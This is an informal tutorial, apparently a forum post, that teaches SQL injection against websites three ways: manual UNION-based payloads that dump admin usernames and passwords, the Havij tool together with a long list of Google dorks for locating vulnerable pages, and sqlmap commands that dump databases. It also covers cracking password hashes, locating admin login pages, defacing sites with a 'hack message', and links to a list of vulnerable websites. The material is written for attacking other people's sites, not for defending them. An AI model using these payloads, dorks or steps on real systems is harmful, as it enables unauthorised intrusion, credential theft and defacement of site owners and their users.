Sql injection with all ways

I need some help to make better this article :)

SQL injection
What SQL injection is?
Sql injection is a way to ‘attack’ to a website.Usually using a website php command to the database , the attacker exploit this vulnerability ‘hole’ to get into the sql database.When the attackers get into there database they usually looking for the admin username and password or if they want take usernames and passwords from the game.

Well action time
There are a lot of ways to SQL injection a website database ..
First way… They way with out any tool
1.You have to find the count of colums.
ex:
www.site.com/index.php?id=79 order by 1–
www.site.com/index.php?id=79 order by 2–
www.site.com/index.php?id=79 order by 3–
etc….
when you find a error you stop.
(if you don’t find any error the the url is not vulnerable)

like
[ Unknown column ‘9’ ]

then you need to put a vulnerable column.
www.site.com/index.php?id=-79+union all select 1,2,3,4,5,6,7,8–

now you need to find the current database
www.site.com/index.php?id=-79+union all select 1,2,3,group_concat(schema_name),5,6,7,8 from information_schema.schemata–

www.site.com/index.php?id=-79+union all select 1,2,3,database(),5,6,7,8 from information_schema.schemata–

get comuns:

www.site.com/index.php?id=-79+union all select 1,2,3,group_concat(column_name),5,6,7,8 from information_schema.columns where table_schema=database()–

get admin username and pass:
www.site.com/index.php?id=-79 union all select 1,2,3,group_concat(login,0x3a,pass,0x3a),5,6,7,8 from column_name–

now you have the username of admin and password
if the password is hashed go here

md5.rednoize.com

now u need to find the admin login page
try /admin /admin.php /admin.html /adminlogin.php if u don’t find anything try this:
if you have the python make a new text file paste this code http://pastebin.com/Y0UKitPP and save it as .py
If you don’t have the python here is a simple admin login finder :http://adf.ly/Ec2m2 and a admin dorks list : http://adf.ly/Ec24t
Still don’t find anything?
Try with a website file scanner like this one : website file scanner
Or any other and search to there websites files for any admin login.

When u find the adminlogin login as a admin , go to file manager and make a javascript code that looks like u r a pro hacker.. or get a ready one here is the link for the matrix:
http://www.dynamicdrive.com/dynamicindex10/matrixeffect.htm

this is the first way..

The second way and the simple that every one can do it is that with the windows programs…
There are a lot of sqli programs..
I am gonna use havij here is the link: havij
First of all you need to find a vulnerability scanner… I am gonna use this :http://sec4app.com/ cuz it give us keyword type and post holes too
Or use the google dorks..
here are some:
allinurl:index.php?id= allinurl:trainers.php?id= allinurl:buy.php?category= allinurl:article.php?ID= allinurl:play_old.php?id= allinurl:newsitem.php?num= allinurl:readnews.php?id= allinurl:top10.php?cat= allinurl:historialeer.php?num= allinurl:reagir.php?num= allinurl:Stray-Questions-View.php?num= allinurl:forum_bds.php?num= allinurl:game.php?id= allinurl:view_product.php?id= allinurl:newsone.php?id= allinurl:sw_comment.php?id= allinurl:news.php?id= allinurl:avd_start.php?avd= allinurl:event.php?id= allinurl:product-item.php?id= allinurl:sql.php?id= allinurl:news_view.php?id= allinurl:select_biblio.php?id= allinurl:humor.php?id= allinurl:aboutbook.php?id= allinurl:ogl_inet.php?ogl_id= allinurl:fiche_spectacle.php?id= allinurl:communique_detail.php?id= allinurl:sem.php3?id= allinurl:kategorie.php4?id= allinurl:news.php?id= allinurl:index.php?id= allinurl:faq2.php?id= allinurl:show_an.php?id= allinurl:preview.php?id= allinurl:loadpsb.php?id= allinurl:opinions.php?id= allinurl:spr.php?id= allinurl:pages.php?id= allinurl:announce.php?id= allinurl:clanek.php4?id= allinurl:participant.php?id= allinurl:download.php?id= allinurl:main.php?id= allinurl:review.php?id= allinurl:chappies.php?id= allinurl:read.php?id= allinurl:prod_detail.php?id= allinurl:viewphoto.php?id= allinurl:article.php?id= allinurl:person.php?id= allinurl:productinfo.php?id= allinurl:showimg.php?id= allinurl:view.php?id= allinurl:website.php?id= allinurl:hosting_info.php?id= allinurl:gallery.php?id= allinurl:rub.php?idr= allinurl:view_faq.php?id= allinurl:artikelinfo.php?id= allinurl:detail.php?ID= allinurl:index.php?= allinurl:profile_view.php?id= allinurl:category.php?id= allinurl:publications.php?id= allinurl:fellows.php?id= allinurl:downloads_info.php?id= allinurl:prod_info.php?id= allinurl:shop.php?do=part&id= allinurl:productinfo.php?id= allinurl:collectionitem.php?id= allinurl:band_info.php?id= allinurl:product.php?id= allinurl:releases.php?id= allinurl:ray.php?id= allinurl:produit.php?id= allinurl:pop.php?id= allinurl:shopping.php?id= allinurl:productdetail.php?id= allinurl:post.php?id= allinurl:viewshowdetail.php?id= allinurl:clubpage.php?id= allinurl:memberInfo.php?id= allinurl:section.php?id= allinurl:theme.php?id= allinurl:page.php?id= allinurl:shredder-categories.php?id= allinurl:tradeCategory.php?id= allinurl:product_ranges_view.php?ID= allinurl:shop_category.php?id= allinurl:transcript.php?id= allinurl:channel_id= allinurl:item_id= allinurl:newsid= allinurl:trainers.php?id= allinurl:news-full.php?id= allinurl:news_display.php?getid= allinurl:index2.php?option= allinurl:readnews.php?id= allinurl:top10.php?cat= allinurl:newsone.php?id= allinurl:event.php?id= allinurl:product-item.php?id= allinurl:sql.php?id= allinurl:aboutbook.php?id= allinurl:preview.php?id= allinurl:loadpsb.php?id= allinurl:pages.php?id= allinurl:clanek.php4?id= allinurl:announce.php?id= allinurl:chappies.php?id= allinurl:read.php?id= allinurl:viewapp.php?id= allinurl:viewphoto.php?id= allinurl:rub.php?idr= allinurl:galeri_info.php?l= allinurl:review.php?id= allinurl:iniziativa.php?in= allinurl:curriculum.php?id= allinurl:labels.php?id= allinurl:story.php?id= allinurl:look.php?ID= allinurl:newsone.php?id= allinurl:aboutbook.php?id=
You scan the website for vulnerability holes… When u find one see what kind of type is (string,interger) what is the keyword the method (havijget,post) and if it has database type it gonna be prefect .
Then put it in the havij and click Anylize …

Wait..


Selected Column Count is 8
Finding string column
Valid String Column is 4
Target Vulnerable :D
Now you need to go tables tick the database and click get tables..

Then you go to the admin table
You click get columns and then click on the admin
Then you tick the username and password and get data

When you get the password if it is hashed the havij have his own tool..
Then you know what to do to find the adminlogin and make a nice ‘hack massage’ .

That was the second way

The third way is the commands way..
For the third way you will need vitrual box : https://www.virtualbox.org/wiki/Downloads
And backtrack 5 : http://www.backtrack-linux.org/downloads
Here is a radom video how to install backtrack 5 to your pc..
video:

When you install backtrack 5 open sqlmap
Here is the commands :
First you need to find a vulnerability hole. like: http://www.site.com/index.php?id=22222
./sqlmap -u http://www.site.com/index.php?id=22222
The command to get databases:
./sqlmap -u http://www.site.com/index.php?id=22222 –dbs
Now you need to find tables here is the command:
./sqlmap -u http://www.site.com/index.php?id=22222 –tables -D database name
The command to find columns
./sqlmap -u [url]–column -T Table-Name -D database name
Now “dump” a column
./sqlmap.py -u http://www.site.com/index.php?id=22222 -D database name -T table name -C column name –dump

And you get The username and pass :)

Websites vutrubility list: http://pastebin.com/spCX8PqG